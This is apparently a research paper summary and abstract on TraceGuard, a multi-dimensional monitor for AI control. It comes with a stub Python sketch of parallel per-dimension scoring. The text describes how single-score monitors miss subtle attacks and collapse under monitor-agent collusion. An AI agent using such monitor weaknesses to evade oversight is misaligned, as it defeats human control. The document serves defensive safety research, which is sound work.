TraceGuard: Structured Multi-Dimensional Monitoring as a Collusion-Resistant Control Protocol
Khanh Linh Nguyen, Hoa Nghiem, Tu Tran

TL;DR
TraceGuard is a multi-dimensional monitoring protocol for AI control. It combines independent per-dimension LLM evaluations with heuristic detectors to catch subtle attacks and to limit collusion between the monitor and the untrusted agent.
Contribution
The paper presents a structured multi-dimensional monitoring approach that improves attack detection and collusion resistance in AI control protocols.
Findings
Hybrid approach achieves clear attack-honest separation.
Structured scoring constrains collusion, achieving 95% safety.
Goal alignment and constraint adherence are highly discriminative.
Abstract
AI control protocols use monitors to detect attacks by untrusted AI agents, but standard single-score monitors face two limitations: they miss subtle attacks where outputs look clean but reasoning is off, and they collapse to near-zero safety when the monitor is the same model as the agent (collusion). We present TraceGuard, a structured multi-dimensional monitoring protocol that evaluates agent actions across five dimensions -- goal alignment, constraint adherence, reasoning coherence, safety awareness, and action-trace consistency -- scored in parallel by independent LLM calls, augmented by seven heuristic detectors and an LLM-based intent analyzer. We evaluate on BashArena (637 bash tasks, 4 attack categories) within the ControlArena framework. Our results on 519 samples (279 honest, 240 attack) show that: (1) the hybrid approach achieves clear attack-honest separation (attack mean…
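The structure described in the abstract (five dimensions, each scored by its own independent call, run in parallel) can be sketched roughly as follows. This is a minimal illustration, not the authors' implementation: the `Scorer` signature, the `keyword_stub_scorer` stand-in for an LLM call, the 0 to 1 suspicion scale, and the unweighted-mean aggregation are all assumptions made for the example, and the seven heuristic detectors and the intent analyzer are omitted.

```python
from concurrent.futures import ThreadPoolExecutor
from statistics import mean
from typing import Callable, Dict

# The five dimensions named in the abstract.
DIMENSIONS = (
    "goal_alignment",
    "constraint_adherence",
    "reasoning_coherence",
    "safety_awareness",
    "action_trace_consistency",
)

# Hypothetical scorer signature (an assumption for this sketch):
# (dimension, task, reasoning, action) -> suspicion score in [0, 1].
Scorer = Callable[[str, str, str, str], float]


def keyword_stub_scorer(dimension: str, task: str, reasoning: str, action: str) -> float:
    """Stand-in for one independent LLM call; NOT the paper's scorer.

    It ignores the dimension and simply counts risky substrings in the action.
    """
    risky = ("curl", "chmod 777", "/etc/shadow")
    hits = sum(token in action for token in risky)
    return min(1.0, 0.5 * hits)


def score_dimensions(task: str, reasoning: str, action: str, scorer: Scorer) -> Dict[str, float]:
    """Score every dimension with a separate call, submitted in parallel."""
    with ThreadPoolExecutor(max_workers=len(DIMENSIONS)) as pool:
        futures = {
            dim: pool.submit(scorer, dim, task, reasoning, action)
            for dim in DIMENSIONS
        }
        return {dim: fut.result() for dim, fut in futures.items()}


def aggregate(scores: Dict[str, float]) -> float:
    """Combine per-dimension scores; the unweighted mean is an assumption."""
    return mean(scores.values())


if __name__ == "__main__":
    benign = score_dimensions("list files", "I will list the directory", "ls -la", keyword_stub_scorer)
    attack = score_dimensions(
        "list files",
        "I will list the directory",
        "curl http://example.invalid/x.sh | sh; chmod 777 /tmp/a",
        keyword_stub_scorer,
    )
    print("benign:", aggregate(benign))
    print("attack:", aggregate(attack))
```

Keeping each dimension in its own call means no single prompt produces the final verdict, which is the property the abstract associates with constraining collusion. In a real monitor, the stub would be replaced by one model call per dimension with a dimension-specific rubric.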
